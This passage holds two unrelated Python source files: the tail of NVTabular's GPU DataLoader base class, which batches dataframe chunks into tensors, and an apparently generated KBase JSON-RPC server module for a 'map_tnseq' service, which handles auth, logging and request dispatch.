        """Worker-thread entry point: run chunk_logic on device `dev`,
        forwarding any raised exception to the consumer through the queue."""
        try:
            itr = iter(self.itr)
            if self.dataloader.device != "cpu":
                with self.dataloader._get_device_ctx(dev):
                    self.chunk_logic(itr)
            else:
                self.chunk_logic(itr)
        except Exception as e:  # pylint: disable=broad-except
            self.put(e)
    # For when an iterator is stopped before iteration is complete.
    def stop(self):
        self._stop_event.set()
        # TODO: should we be clearing? I can imagine a world where
        # you want the thread to stop but still want to grab
        # data out of the buffer
        self.q_out.queue.clear()
    def start(self):
        # Re-arm the queue for a new epoch.
        self._stop_event.clear()
    def get_batch_div_chunk(self, chunks, batch_size):
        """Split `chunks` into a batch_size-aligned head and a remainder tail."""
        # TODO: is there a way to do this using cupy?
        spill_idx = int(chunks.shape[0] / batch_size) * batch_size
        spill = _make_df(chunks.iloc[spill_idx:])
        chunks = _make_df(chunks.iloc[:spill_idx])
        if not chunks.empty:
            chunks.reset_index(drop=True, inplace=True)
        if not spill.empty:
            spill.reset_index(drop=True, inplace=True)
        return chunks, spill
# TODO: implement as metaclass and assign methods to children
# to avoid having to do Dataset.<method> calls?
class DataLoader:
    """Base class for NVTabular's framework-specific data loaders.

    Pulls chunks of an NVTabular ``Dataset`` off a background ``ChunkQueue``,
    splits them into batch-size tensors and yields framework-specific batches.
    Subclasses implement the conversion hooks (``_to_tensor``, ``_split_fn``,
    ``_get_device_ctx``, the dtype properties, ...).
    """
    # Whether subclasses consume per-row list lengths (nnzs) instead of offsets.
    _use_nnz = False
    def __init__(
        self,
        dataset,
        batch_size,
        shuffle,
        cat_names=None,
        cont_names=None,
        label_names=None,
        seed_fn=None,
        parts_per_chunk=1,
        device=None,
        global_size=None,
        global_rank=None,
        drop_last=False,
        sparse_names=None,
        sparse_max=None,
        sparse_as_dense=False,
    ):
        self.data = dataset
        self.indices = cp.arange(dataset.to_ddf().npartitions)
        self.drop_last = drop_last
        self.device = device or 0
        self.sparse_names = sparse_names or []
        self.sparse_max = sparse_max or {}
        self.sparse_as_dense = sparse_as_dense
        self.global_size = global_size or 1
        self.global_rank = global_rank or 0
        # Fall back to the dataset schema's tags when explicit column lists
        # are not supplied.
        self.cat_names = cat_names or dataset.schema.select_by_tag(Tags.CATEGORICAL).column_names
        self.cont_names = cont_names or dataset.schema.select_by_tag(Tags.CONTINUOUS).column_names
        self.label_names = label_names or dataset.schema.select_by_tag(Tags.TARGETS).column_names
        if not self.cat_names and not self.cont_names:
            raise ValueError(
                "Neither Categorical or Continuous columns were found by the dataloader. "
                "You must either specify the cat_names, cont_names and "
                "label_names properties or supply a schema.pbtxt file in dataset directory."
            )
        self.batch_size = batch_size
        self.shuffle = shuffle
        self.seed_fn = seed_fn
        self.num_rows_processed = 0
        # we set size of chunk queue to 1 we only want one chunk in queue at a time.
        self._buff = ChunkQueue(self, 1, num_parts=parts_per_chunk, shuffle=shuffle)
        # run once instead of everytime len called
        self._buff_len = len(self._buff)
        self._batch_itr = None
        self._workers = None
    def __len__(self):
        """Number of batches this loader yields per epoch."""
        batches = _num_steps(self._buff_len, self.batch_size)
        if self.drop_last and self._buff_len % self.batch_size > 0:
            batches = batches - 1
        return batches
    @property
    def _working(self):
        # True while any loader thread is still alive.
        if self._workers is not None:
            return any(t.is_alive() for t in self._workers)
        return False
    def stop(self):
        """Halt the background loader threads and drop any buffered data."""
        # TODO: raise warning or even error if condition
        # isn't met?
        if self._workers is not None:
            if not self._buff.stopped:
                self._buff.stop()
            for t in self._workers:
                t.join()
            # remove joined threads from list
            self._workers = None
        self._buff.q_out.queue.clear()
        self._batch_itr = None
    def _gather_indices_for_dev(self, dev):
        """Return the slice of partition indices this process should read."""
        # this should be self.indices divided by total processes, global set
        if len(self.indices) < self.global_size:
            warnings.warn(
                f"""You have more processes({self.global_size}) than dataset
                    partitions({len(self.indices)}), reduce the number of processes."""
            )
            raise IndexError
        per_worker = _num_steps(len(self.indices), self.global_size)
        # identify process rank out of all processes (not local rank)
        start = self.global_rank * per_worker
        return self.indices[start : start + per_worker].tolist()
    def _generate_local_seed(self):
        """Reseed cupy with a per-rank seed derived from the shared RNG state."""
        random_state = cp.random.get_random_state()
        seeds = random_state.tomaxint(size=self.global_size)
        local_seed = seeds[self.global_rank]
        cp.random.seed(local_seed.get())
    def _shuffle_indices(self):
        """Shuffle partition order; `seed_fn`, when given, can keep ranks in sync."""
        self._generate_local_seed()
        if self.seed_fn:
            new_seed = self.seed_fn()
            cp.random.seed(new_seed)
        cp.random.shuffle(self.indices)
        self._generate_local_seed()
    def __iter__(self):
        """Reset state and start a fresh background loader thread."""
        self.stop()
        self.num_rows_processed = 0
        if self._buff.stopped:
            self._buff.start()
        # shuffle partition indices to bring disparate
        # parts of the dataset "close" to one another
        if self.shuffle:
            self._shuffle_indices()
        # build and start new threads for loading and
        # concatenating data
        self._workers = []
        t = threading.Thread(target=self._buff.load_chunks, args=(self.device,))
        t.daemon = True
        t.start()
        self._workers.append(t)
        return self
    def __next__(self):
        return self._get_next_batch()
    def _fetch_chunk(self):
        """Pull the next chunk off the queue; worker exceptions are re-raised here."""
        chunks = self._buff.get()
        if isinstance(chunks, Exception):
            self.stop()
            raise chunks
        self._batch_itr = iter(chunks)
    def _get_next_batch(self):
        """
        adding this cheap shim so that we can call this
        step without it getting overridden by the
        framework-specific parent class's `__next__` method.
        TODO: can this be better solved with a metaclass
        implementation? My gut is that we don't actually
        necessarily *want*, in general, to be overriding
        __next__ and __iter__ methods
        """
        # we've never initialized, do that now
        # need this because tf.keras.Model.fit will
        # call next() cold
        if self._workers is None:
            DataLoader.__iter__(self)
        # get the first chunks
        if self._batch_itr is None:
            self._fetch_chunk()
        # try to iterate through existing batches
        try:
            batch = next(self._batch_itr)
        except StopIteration:
            # anticipate any more chunks getting created
            # if not, raise the StopIteration
            if not self._working and self._buff.empty:
                self._workers = None
                self._batch_itr = None
                raise
            # otherwise get the next chunks and return
            # the first batch
            self._fetch_chunk()
            batch = next(self._batch_itr)
        # if batch[0] is empty but other exist
        for sub in batch:
            if sub is not None and len(sub) > 0:
                self.num_rows_processed += len(sub)
                break
        return batch
    def make_tensors(self, gdf, use_nnz=False):
        """Convert a dataframe chunk into a list of per-batch tensor tuples."""
        split_idx = self._get_segment_lengths(len(gdf))
        # map from big chunk to framework-specific tensors
        chunks = self._create_tensors(gdf)
        # if we have any offsets, calculate nnzs up front
        if len(chunks) == 4:
            offsets = chunks[-1]
            if use_nnz:
                nnzs = offsets[1:] - offsets[:-1]
            chunks = chunks[:-1]
        # split them into batches and map to the framework-specific output format
        batches = [[] for _ in range(len(split_idx))]
        offset_idx = 0
        for chunk in chunks:
            lists = None
            if isinstance(chunk, tuple):
                chunk, lists = chunk
            if len(split_idx) > 1 and chunk is not None:
                chunk = self._split_fn(chunk, split_idx)
            else:
                chunk = [chunk for _ in split_idx]
            if lists is not None:
                num_list_columns = len(lists)
                # grab the set of offsets and nnzs corresponding to
                # the list columns from this chunk
                chunk_offsets = offsets[:, offset_idx : offset_idx + num_list_columns]
                if use_nnz:
                    chunk_nnzs = nnzs[:, offset_idx : offset_idx + num_list_columns]
                offset_idx += num_list_columns
                # split them into batches, including an extra 1 on the offsets
                # so we know how long the very last element is
                batch_offsets = self._split_fn(chunk_offsets, split_idx + [1])
                if use_nnz and len(split_idx) > 1:
                    batch_nnzs = self._split_fn(chunk_nnzs, split_idx)
                elif use_nnz:
                    batch_nnzs = [chunk_nnzs]
                else:
                    batch_nnzs = [None] * (len(batch_offsets) - 1)
                # group all these indices together and iterate through
                # them in batches to grab the proper elements from each
                # values tensor
                chunk = zip(chunk, batch_offsets[:-1], batch_offsets[1:], batch_nnzs)
            for n, c in enumerate(chunk):
                if isinstance(c, tuple):
                    c, off0s, off1s, _nnzs = c
                    offsets_split_idx = [1 for _ in range(num_list_columns)]
                    off0s = self._split_fn(off0s, offsets_split_idx, axis=1)
                    off1s = self._split_fn(off1s, offsets_split_idx, axis=1)
                    if use_nnz:
                        _nnzs = self._split_fn(_nnzs, offsets_split_idx, axis=1)
                    # TODO: does this need to be ordereddict?
                    batch_lists = {}
                    for k, (column_name, values) in enumerate(lists.items()):
                        off0, off1 = off0s[k], off1s[k]
                        if use_nnz:
                            nnz = _nnzs[k]
                        # need to grab scalars for TF case
                        if len(off0.shape) == 1:
                            start, stop = off0[0], off1[0]
                        elif len(off0.shape) == 2:
                            start, stop = off0[0, 0], off1[0, 0]
                        else:
                            print(off0, off1)
                            raise ValueError
                        value = values[start:stop]
                        index = off0 - start if not use_nnz else nnz
                        batch_lists[column_name] = (value, index)
                    c = (c, batch_lists)
                batches[n].append(c)
        return [self._handle_tensors(*batch) for batch in batches]
    def _get_segment_lengths(self, num_samples):
        """
        Helper function to build indices to pass
        to <torch|tf>.split functions for breaking
        up into batches
        """
        num_full_batches = _num_steps(num_samples, self.batch_size) - 1
        idx = [self.batch_size for _ in range(num_full_batches)]
        idx.append(num_samples - num_full_batches * self.batch_size)
        return idx
    def _to_sparse_tensor(self, values_offset, column_name):
        """
        Create a sparse representation of the input tensor.
        values_offset is either a tensor or a tuple of tensor, offset.
        """
        seq_limit = self.sparse_max[column_name]
        values, offsets, diff_offsets, num_rows = self._pull_values_offsets(values_offset)
        max_seq_len = self._get_max_seq_len(diff_offsets)
        if max_seq_len > seq_limit:
            raise ValueError(
                "The default sequence length has been configured "
                + f"to {seq_limit} but the "
                + f"largest sequence in this batch have {max_seq_len} length"
            )
        return self._build_sparse_tensor(values, offsets, diff_offsets, num_rows, seq_limit)
    def _to_tensor(self, gdf, dtype=None):
        """
        One of the mandatory functions a child class needs
        to implement. Maps from a cudf DataFrame to a
        tensor in the appropriate library, with an optional
        dtype kwarg to do explicit casting if need be
        """
        raise NotImplementedError
    def _get_device_ctx(self, dev):
        """
        One of the mandatory functions a child class needs
        to implement. Maps from a GPU index to a framework
        context object for placing tensors on specific GPUs
        """
        raise NotImplementedError
    def _split_fn(self, tensor, idx, axis=0):
        # Subclass hook: split `tensor` into pieces with the sizes in `idx`.
        raise NotImplementedError
    @property
    def _LONG_DTYPE(self):
        # Subclass hook: the framework's 64-bit integer dtype.
        raise NotImplementedError
    @property
    def _FLOAT32_DTYPE(self):
        # Subclass hook: the framework's 32-bit float dtype.
        raise NotImplementedError
    def _separate_list_columns(self, gdf):
        """Partition gdf's columns into (scalar, list-dtype) name lists."""
        lists, scalars = [], []
        for col in gdf.columns:
            if _is_list_dtype(gdf[col]):
                lists.append(col)
            else:
                scalars.append(col)
        return _get_embedding_order(scalars), _get_embedding_order(lists)
    def _create_tensors(self, gdf):
        """
        Breaks a dataframe down into the relevant
        categorical, continuous, and label tensors.
        Can be overrideen
        """
        workflow_nodes = (self.cat_names, self.cont_names, self.label_names)
        dtypes = (self._LONG_DTYPE, self._FLOAT32_DTYPE, self._FLOAT32_DTYPE)
        tensors = []
        offsets = _make_df(device=self.device)
        for column_names, dtype in zip(workflow_nodes, dtypes):
            if len(column_names) == 0:
                tensors.append(None)
                continue
            gdf_i = gdf[column_names]
            # Drop processed columns so memory is released incrementally.
            gdf.drop(columns=column_names, inplace=True)
            scalars, lists = self._separate_list_columns(gdf_i)
            x = None
            if scalars:
                # should always return dict column_name: values, offsets (optional)
                x = self._to_tensor(gdf_i[scalars], dtype)
            if lists:
                list_tensors = OrderedDict()
                for column_name in lists:
                    column = gdf_i.pop(column_name)
                    leaves, offsets[column_name] = _pull_apart_list(column)
                    list_tensors[column_name] = self._to_tensor(leaves, dtype)
                x = x, list_tensors
            tensors.append(x)
        if not offsets.empty:
            offsets_tensor = self._to_tensor(offsets, self._LONG_DTYPE)
            if len(offsets_tensor.shape) == 1:
                offsets_tensor = offsets_tensor[:, None]
            tensors.append(offsets_tensor)
        del gdf, offsets
        return tensors
    def _handle_tensors(self, cats, conts, labels):
        """Assemble a (features_dict, labels) pair from raw tensor groups."""
        X = {}
        for tensor, names in zip([cats, conts], [self.cat_names, self.cont_names]):
            lists = {}
            if isinstance(tensor, tuple):
                tensor, lists = tensor
            names = [i for i in names if i not in lists]
            # now add in any scalar tensors
            if len(names) > 1:
                tensors = self._tensor_split(tensor, len(names), axis=1)
                lists.update(zip(names, tensors))
            elif len(names) == 1:
                lists[names[0]] = tensor
            X.update(lists)
        for column_name in X:
            if column_name in self.sparse_names:
                if column_name not in self.sparse_max:
                    raise ValueError(
                        f"Did not convert {column_name} to sparse due to missing sparse_max entry"
                    )
                X[column_name] = self._to_sparse_tensor(X[column_name], column_name)
        # TODO: use dict for labels as well?
        # would require output layers to match naming
        if len(self.label_names) > 1:
            labels = self._tensor_split(labels, len(self.label_names), axis=1)
        return X, labels
|
map_tnseqServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from map_tnseq.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
    """Path of the KBase deployment config, or None when not configured."""
    return environ.get(DEPLOY)
def get_service_name():
    """Service name from the environment, or None when not configured."""
    return environ.get(SERVICE)
def get_config():
    """Read this service's section of the deploy config into a plain dict.

    Returns None when no deployment config file is configured.
    """
    config_file = get_config_file()
    if not config_file:
        return None
    parser = ConfigParser()
    parser.read(config_file)
    section = get_service_name() or 'map_tnseq'
    return {key: value for key, value in parser.items(section)}
# The deploy config is read once at import time; both the implementation
# object and the WSGI Application below capture it.
config = get_config()
from map_tnseq.map_tnseqImpl import map_tnseq  # noqa @IgnorePep8
impl_map_tnseq = map_tnseq(config)
class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that also handles sets, frozensets, and any object
    exposing a ``toJSONable()`` method."""
    def default(self, obj):
        # set/frozenset have no JSON representation; serialize as a list.
        # (Single isinstance call with a tuple replaces the two separate checks.)
        if isinstance(obj, (set, frozenset)):
            return list(obj)
        # Objects can opt in to serialization by providing toJSONable().
        if hasattr(obj, 'toJSONable'):
            return obj.toJSONable()
        # Fall through to the base class, which raises TypeError.
        return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
    """JSONRPCService subclass that serializes results with JSONObjectEncoder
    and wraps implementation exceptions in JSON-RPC server errors."""
    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.
        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)
        return None
    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # Does it have enough arguments?
                # (the -1 accounts for ctx, which the caller does not supply)
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')
                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.
                if request['jsonrpc'] < 11:
                    raise KeywordError
                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if len(e.args) == 1:
                newerr.data = repr(e.args[0])
            else:
                newerr.data = repr(e.args)
            raise newerr
        return result
    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.
        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        # try:
        #     rdata = json.loads(jsondata)
        # except ValueError:
        #     raise ParseError
        # set some default values for error handling
        request = self._get_default_vals()
        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)
            # Don't respond to notifications
            if respond is None:
                return None
            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)
            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)
            if responds:
                return responds
            # Nothing to respond.
            return None
        else:
            # empty dict, list or wrong type
            raise InvalidRequestError
    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        if 'types' in self.method_data[request['method']]:
            self._validate_params_types(request['method'], request['params'])
        result = self._call_method(ctx, request)
        # Do not respond to notifications.
        if request['id'] is None:
            return None
        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']
        return respond
class MethodContext(dict):
    """Per-call context dict (client IP, user, token, provenance, ...) with
    logging helpers bound to the server logger."""
    def __init__(self, logger):
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Levels (numeric or symbolic) that are passed through unchanged.
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger
    def log_err(self, message):
        self._log(log.ERR, message)
    def log_info(self, message):
        self._log(log.INFO, message)
    def log_debug(self, message, level=1):
        """Log at debug level 1-3, or at a level from _debug_levels directly."""
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            # Map debug levels 1-3 onto log levels 7-9.
            level = level + 6
        self._log(level, message)
    def set_log_level(self, level):
        self._logger.set_log_level(level)
    def get_log_level(self):
        return self._logger.get_log_level()
    def clear_log_level(self):
        self._logger.clear_user_log_level()
    def _log(self, level, message):
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])
    def provenance(self):
        """Fetch call provenance from the SDK callback server when one is
        configured, otherwise return the locally recorded provenance."""
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                # A 500 with a JSON body carries a structured JSON-RPC error.
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')
class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''
    def __init__(self, name, code, message, data=None, error=None):
        super(Exception, self).__init__(message)
        self.name = name
        self.code = code
        self.message = message or ''
        # 'data' is the JSON-RPC 2.0 field name, 'error' the 1.1 one.
        self.data = data or error or ''
    def __str__(self):
        return '{}: {}. {}\n{}'.format(
            self.name, str(self.code), self.message, self.data)
def getIPAddress(environ):
    """Best-effort client IP: honor X-Forwarded-For / X-Real-IP headers unless
    the config explicitly says not to trust them; fall back to REMOTE_ADDR."""
    trust_x_headers = config is None or \
        config.get('dont_trust_x_ip_headers') != 'true'
    if trust_x_headers:
        forwarded = environ.get('HTTP_X_FORWARDED_FOR')
        if forwarded:
            # First entry in the comma-separated chain is the originating client.
            return forwarded.split(',')[0].strip()
        real_ip = environ.get('HTTP_X_REAL_IP')
        if real_ip:
            return real_ip.strip()
    return environ.get('REMOTE_ADDR')
class Application(object):
    # Wrap the wsgi handler in a class definition so that we can
    # do some initialization and avoid regenerating stuff over
    # and over
    def logcallback(self):
        # Keep the server log pointed at the (possibly rotated) user log file.
        self.serverlog.set_log_file(self.userlog.get_log_file())
    def log(self, level, context, message):
        self.serverlog.log_message(level, message, context['client_ip'],
                                   context['user_id'], context['module'],
                                   context['method'], context['call_id'])
    def __init__(self):
        """Set up logging, register the service methods, create the auth client."""
        submod = get_service_name() or 'map_tnseq'
        self.userlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, changecallback=self.logcallback,
            config=get_config_file())
        self.serverlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, logfile=self.userlog.get_log_file())
        self.serverlog.set_log_level(6)
        self.rpc_service = JSONRPCServiceCustom()
        self.method_authentication = dict()
        self.rpc_service.add(impl_map_tnseq.run_map_tnseq,
                             name='map_tnseq.run_map_tnseq',
                             types=[dict])
        self.method_authentication['map_tnseq.run_map_tnseq'] = 'required'  # noqa
        self.rpc_service.add(impl_map_tnseq.status,
                             name='map_tnseq.status',
                             types=[dict])
        authurl = config.get(AUTH) if config else None
        self.auth_client = _KBaseAuth(authurl)
    def __call__(self, environ, start_response):
        """WSGI entry point: parse the JSON-RPC body, authenticate, dispatch,
        and return the serialized JSON response."""
        # Context object, equivalent to the perl impl CallContext
        ctx = MethodContext(self.userlog)
        ctx['client_ip'] = getIPAddress(environ)
        status = '500 Internal Server Error'
        try:
            body_size = int(environ.get('CONTENT_LENGTH', 0))
        except (ValueError):
            body_size = 0
        if environ['REQUEST_METHOD'] == 'OPTIONS':
            # we basically do nothing and just return headers
            status = '200 OK'
            rpc_result = ""
        else:
            request_body = environ['wsgi.input'].read(body_size)
            try:
                req = json.loads(request_body)
            except ValueError as ve:
                err = {'error': {'code': -32700,
                                 'name': "Parse error",
                                 'message': str(ve),
                                 }
                       }
                rpc_result = self.process_error(err, ctx, {'version': '1.1'})
            else:
                ctx['module'], ctx['method'] = req['method'].split('.')
                ctx['call_id'] = req['id']
                ctx['rpc_context'] = {
                    'call_stack': [{'time': self.now_in_utc(),
                                    'method': req['method']}
                                   ]
                }
                prov_action = {'service': ctx['module'],
                               'method': ctx['method'],
                               'method_params': req['params']
                               }
                ctx['provenance'] = [prov_action]
                try:
                    token = environ.get('HTTP_AUTHORIZATION')
                    # parse out the method being requested and check if it
                    # has an authentication requirement
                    method_name = req['method']
                    auth_req = self.method_authentication.get(
                        method_name, 'none')
                    if auth_req != 'none':
                        if token is None and auth_req == 'required':
                            err = JSONServerError()
                            err.data = (
                                'Authentication required for ' +
                                'map_tnseq ' +
                                'but no authentication header was passed')
                            raise err
                        elif token is None and auth_req == 'optional':
                            pass
                        else:
                            try:
                                user = self.auth_client.get_user(token)
                                ctx['user_id'] = user
                                ctx['authenticated'] = 1
                                ctx['token'] = token
                            except Exception as e:
                                # Bad tokens only fail hard when auth is required.
                                if auth_req == 'required':
                                    err = JSONServerError()
                                    err.data = \
                                        "Token validation failed: %s" % e
                                    raise err
                    if (environ.get('HTTP_X_FORWARDED_FOR')):
                        self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
                                 environ.get('HTTP_X_FORWARDED_FOR'))
                    self.log(log.INFO, ctx, 'start method')
                    rpc_result = self.rpc_service.call(ctx, req)
                    self.log(log.INFO, ctx, 'end method')
                    status = '200 OK'
                except JSONRPCError as jre:
                    err = {'error': {'code': jre.code,
                                     'name': jre.message,
                                     'message': jre.data
                                     }
                           }
                    trace = jre.trace if hasattr(jre, 'trace') else None
                    rpc_result = self.process_error(err, ctx, req, trace)
                except Exception:
                    err = {'error': {'code': 0,
                                     'name': 'Unexpected Server Error',
                                     'message': 'An unexpected server error ' +
                                                'occurred',
                                     }
                           }
                    rpc_result = self.process_error(err, ctx, req,
                                                    traceback.format_exc())
        # print('Request method was %s\n' % environ['REQUEST_METHOD'])
        # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
        # print('Request body was: %s' % request_body)
        # print('Result from the method call is:\n%s\n' % \
        #    pprint.pformat(rpc_result))
        if rpc_result:
            response_body = rpc_result
        else:
            response_body = ''
        response_headers = [
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Headers', environ.get(
                'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
            ('content-type', 'application/json'),
            ('content-length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body.encode('utf8')]
    def process_error(self, error, context, request, trace=None):
        """Log the traceback and shape `error` per the request's RPC version."""
        if trace:
            self.log(log.ERR, context, trace.split('\n')[0:-1])
        if 'id' in request:
            error['id'] = request['id']
        if 'version' in request:
            error['version'] = request['version']
            e = error['error'].get('error')
            if not e:
                error['error']['error'] = trace
        elif 'jsonrpc' in request:
            error['jsonrpc'] = request['jsonrpc']
            error['error']['data'] = trace
        else:
            error['version'] = '1.0'
            error['error']['error'] = trace
        return json.dumps(error)
    def now_in_utc(self):
        """Local time in ISO format with the UTC offset appended."""
        # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
        dtnow = datetime.datetime.now()
        dtutcnow = datetime.datetime.utcnow()
        delta = dtnow - dtutcnow
        hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                        60)
        return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
# Single module-level WSGI application instance, shared by uwsgi, the
# stand-alone BaseHTTP server started below, and the async CLI mode.
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
    # Before we do anything with the application, see if the
    # configs specify patching all std routines to be asynch
    # *ONLY* use this if you are going to wrap the service in
    # a wsgi container that has enabled gevent, such as
    # uwsgi with the --gevent option
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print("Monkeypatching std libraries for async")
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass
# Handle on the child server process when started with newprocess=True;
# None while no background server is running.
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
    """Start the JSON-RPC HTTP server.

    By default the server binds to *host* on a system-assigned port and
    serves in the current thread, blocking until interrupted.  With
    ``newprocess=True`` the server runs in a daemonized child process,
    the call returns immediately, and the bound port number is returned;
    ``stop_server`` can then be used to shut it down.
    """
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    server = make_server(host, port, application)
    bound_port = server.server_address[1]
    print("Listening on port %s" % bound_port)
    if not newprocess:
        # Blocks until the process is interrupted.
        server.serve_forever()
    else:
        _proc = Process(target=server.serve_forever)
        _proc.daemon = True
        _proc.start()
    return bound_port
def stop_server():
    """Terminate the background server started via start_server(newprocess=True).

    Raises RuntimeError if no server is running (previously this crashed
    with ``AttributeError: 'NoneType' object has no attribute 'terminate'``),
    mirroring the "already running" guard in start_server.
    """
    global _proc
    if _proc is None:
        raise RuntimeError('server is not running')
    _proc.terminate()
    _proc = None
def process_async_cli(input_file_path, output_file_path, token):
    """Execute a single JSON-RPC request read from a file (async CLI mode).

    Reads the request from *input_file_path*, runs it through the module's
    ``application`` with an authenticated context when *token* is given,
    and writes the JSON response to *output_file_path*.

    Returns 0 on success, 500 when the response carries an error.
    """
    exit_code = 0
    with open(input_file_path) as in_file:
        req = json.load(in_file)
    # Fill in JSON-RPC bookkeeping fields the caller may have omitted.
    req.setdefault('version', '1.1')
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    # Record a single provenance entry for this call.
    ctx['provenance'] = [{'service': ctx['module'],
                          'method': ctx['method'],
                          'method_params': req['params']}]
    response = None
    try:
        response = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        error = {'code': jre.code,
                 'name': jre.message,
                 'message': jre.data,
                 'error': jre.trace if hasattr(jre, 'trace') else None}
        response = {'id': req['id'],
                    'version': req['version'],
                    'error': error}
    except Exception:
        error = {'code': 0,
                 'name': 'Unexpected Server Error',
                 'message': 'An unexpected server error occurred',
                 'error': traceback.format_exc()}
        response = {'id': req['id'],
                    'version': req['version'],
                    'error': error}
    if 'error' in response:
        exit_code = 500
    with open(output_file_path, "w") as out_file:
        out_file.write(json.dumps(response, cls=JSONObjectEncoder))
    return exit_code
if __name__ == "__main__":
    # Two invocation modes:
    #   1. Async CLI:  script <input-json-file> <output-file> [token|token-file]
    #   2. Server:     script [--host HOST] [--port PORT]
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
